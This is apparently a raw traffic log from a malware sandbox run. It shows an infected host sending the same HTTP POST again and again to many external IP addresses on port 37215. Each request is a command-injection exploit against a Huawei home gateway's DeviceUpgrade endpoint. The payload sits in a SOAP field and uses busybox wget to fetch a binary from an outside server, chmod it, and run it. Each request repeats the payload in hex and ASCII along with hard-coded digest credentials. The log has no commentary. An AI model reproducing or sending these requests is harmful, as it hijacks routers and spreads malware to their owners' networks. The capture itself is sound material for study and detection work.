                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:20.361730099 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:36.233331919 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:18:08.999485016 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      42192.168.2.1441020197.128.55.19037215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.591334105 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      43192.168.2.1458168102.195.130.4237215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.592592955 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      44192.168.2.1441480102.218.221.19837215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.593837976 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.922099113 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.418143034 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.410018921 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.362128019 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
